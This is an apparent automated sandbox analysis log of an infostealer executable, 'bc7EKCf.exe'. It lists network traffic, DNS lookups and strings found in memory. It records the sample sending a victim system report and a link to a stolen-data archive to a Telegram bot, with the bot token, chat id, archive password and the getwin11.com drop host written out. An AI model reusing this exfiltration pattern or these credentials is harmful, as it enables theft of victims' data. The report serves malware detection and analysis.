                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.74
                Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.74
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.74
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.74
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.74
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.74
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.74
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.74
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 104.70.121.217
                Source: unknownTCP traffic detected without corresponding DNS query: 104.70.121.217
                Source: unknownTCP traffic detected without corresponding DNS query: 104.70.121.217
                Source: unknownTCP traffic detected without corresponding DNS query: 104.70.121.217
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 104.70.121.217
                Source: unknownTCP traffic detected without corresponding DNS query: 104.70.121.217
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.93
                Source: unknownTCP traffic detected without corresponding DNS query: 104.70.121.217
                Source: unknownTCP traffic detected without corresponding DNS query: 104.70.121.217
                Source: unknownTCP traffic detected without corresponding DNS query: 104.70.121.217
                Source: unknownTCP traffic detected without corresponding DNS query: 104.70.121.217
                Source: unknownTCP traffic detected without corresponding DNS query: 104.70.121.217
                Source: unknownTCP traffic detected without corresponding DNS query: 104.70.121.217
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.219
                Source: global trafficHTTP traffic detected: GET /bot7831867283:AAEopA7q0c646Jx2HXjB55s1f-y8Uh1Ze0I/getMe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b?rn=1736416763900&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0F21C4DE7A1B6788277DD1B17BB36680&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b2?rn=1736416763900&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0F21C4DE7A1B6788277DD1B17BB36680&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1454398e939674cb6b4e57f1736416764; XID=1454398e939674cb6b4e57f1736416764
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736416763899&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b22f4747dbd8407584046bcaed3aa480&activityId=b22f4747dbd8407584046bcaed3aa480&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=0125A3251C5C420C9BB6786682DD1947&MUID=0F21C4DE7A1B6788277DD1B17BB36680 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0F21C4DE7A1B6788277DD1B17BB36680; _EDGE_S=F=1&SID=02BA5CD7B7DE65FD0E7049B8B6C764A6; _EDGE_V=1; SM=T
                Source: global trafficHTTP traffic detected: GET /bot7831867283:AAEopA7q0c646Jx2HXjB55s1f-y8Uh1Ze0I/sendMessage?chat_id=-1002445444966&text=%F0%9F%94%8D%20System%20Report%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%F0%9F%97%93%EF%B8%8F%20Date%3A%202025-01-09%204%3A59%3A04%20am%0A%F0%9F%96%A5%EF%B8%8F%20Operating%20System%3A%20Windows%2010%20Pro%20%2864%20Bit%29%0A%F0%9F%91%A4%20User%20Name%3A%20user%0A%F0%9F%92%BB%20Computer%20Name%3A%20618321%0A%F0%9F%8C%90%20IP%20Address%3A%208.46.123.189%0A%F0%9F%8C%8D%20Language%20and%20Region%3A%20%F0%9F%87%A8%F0%9F%87%AD%20-%20en-CH%0A%F0%9F%9B%A1%EF%B8%8F%20AV%3A%20Windows%20Defender.%0A%0A%E2%96%B6%EF%B8%8F%20Keywords%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%0A%20%20%20%E2%88%9F%20Keywords%20%28No%20data%29%0A%0A%E2%96%B6%EF%B8%8F%20Browser%20and%20Application%20Data%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%0A%20%20%20%E2%88%9F%20%F0%9F%8D%AA%20Cookies%3A%2010%0A%20%20%20%E2%88%9F%20%F0%9F%93%9C%20Browsing%20History%3A%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks%3A%205%0A%0A%E2%96%B6%EF%B8%8F%20Software%20and%20Account%20Info%0A%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A%0A%0A%F0%9F%94%97%20%5BDownload%20Archived%20Data%5D%28http%3A%2F%2Fgetwin11.com%2Fnull%2Fuser%40618321_en-CH.zip%29%0A%F0%9F%94%90%20Archive%20Password%3A%20%22103e3ba0017c0e70b446b0109ac853f8%22&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: apis.google.com
                Source: global trafficDNS traffic detected: DNS query: play.google.com
                Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                Source: global trafficDNS traffic detected: DNS query: c.msn.com
                Source: global trafficDNS traffic detected: DNS query: api.msn.com
                Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global trafficDNS traffic detected: DNS query: getwin11.com
                Source: global trafficDNS traffic detected: DNS query: icanhazip.com
                Source: unknownHTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 913sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.0000000003419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.0000000003419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.0000000003331000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.000000000324F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://getwin11.com
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.0000000003339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://getwin11.com/
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000324F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://getwin11.com/asd.php
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000324F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://getwin11.com/asd.phpT
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.0000000003427000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.000000000313A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://getwin11.com/null/user
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.0000000003331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://getwin11.comd
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.0000000003339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.0000000003339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.comT
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.0000000003339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.comd
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.0000000003339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.comt
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: chromecache_590.8.drString found in binary or memory: http://www.broofa.com
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: bc7EKCf.exe, 00000000.00000002.1812963450.0000000005B74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com08
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: bc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: tmp473E.tmp.dat.2.dr, tmp470E.tmp.dat.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chromecache_593.8.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
                Source: chromecache_593.8.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
                Source: bc7EKCf.exe, 00000002.00000002.2011473460.0000000008A10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/binaryformatter
                Source: bc7EKCf.exe, 00000002.00000002.2011473460.0000000008A10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
                Source: bc7EKCf.exe, 00000002.00000002.2011473460.0000000008A10000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.0000000003339000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7831867283:AAEopA7q0c646Jx2HXjB55s1f-y8Uh1Ze0I/getMe
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000340C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7831867283:AAEopA7q0c646Jx2HXjB55s1f-y8Uh1Ze0I/sendMessage
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.0000000003339000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.0000000003419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7831867283:AAEopA7q0c646Jx2HXjB55s1f-y8Uh1Ze0I/sendMessage?chat_id=-1002
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000340C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgd
                Source: chromecache_590.8.dr, chromecache_593.8.drString found in binary or memory: https://apis.google.com
                Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://assets.msn.cn/resolver/
                Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://assets.msn.com/resolver/
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://bard.google.com/
                Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://bit.ly/wb-precache
                Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://browser.events.data.msn.cn/
                Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://browser.events.data.msn.com/
                Source: Reporting and NEL.14.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://c.msn.com/
                Source: tmp473E.tmp.dat.2.dr, tmp470E.tmp.dat.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: offscreendocument_main.js.14.dr, service_worker_bin_prod.js.14.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
                Source: tmp473E.tmp.dat.2.dr, tmp470E.tmp.dat.2.dr, tmpF945.tmp.dat.2.dr, Web Data.14.dr, tmpF934.tmp.dat.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
